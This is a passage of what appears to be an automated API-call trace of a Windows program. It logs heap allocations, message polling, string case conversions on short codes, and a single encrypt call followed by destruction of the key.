Size=0x10) returned 0x34aa790 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.453] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.453] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.453] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0190.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.454] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34be110*, pdwDataLen=0x8bef68*=0xbeb2, dwBufLen=0xbeb8 | out: pbData=0x34be110*, pdwDataLen=0x8bef68*=0xbeb8) returned 1 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0190.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.456] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.457] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.457] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.458] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.458] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.458] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.458] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.458] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.458] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.458] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.459] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.459] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.459] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.459] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.459] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.459] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.460] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.460] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.460] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.460] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0190.464] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.464] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.464] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.467] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.467] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.468] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0190.468] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.468] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0190.468] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.468] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.468] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.468] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.468] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.468] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.469] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.469] CryptDestroyKey (hKey=0xaa5860) returned 1 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.469] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.469] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.470] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.470] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.470] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.470] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.470] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.470] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.470] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0190.470] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.470] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.470] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0190.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0190.471] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.471] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.471] CharUpperBuffW (in: lpsz="A060070245B", 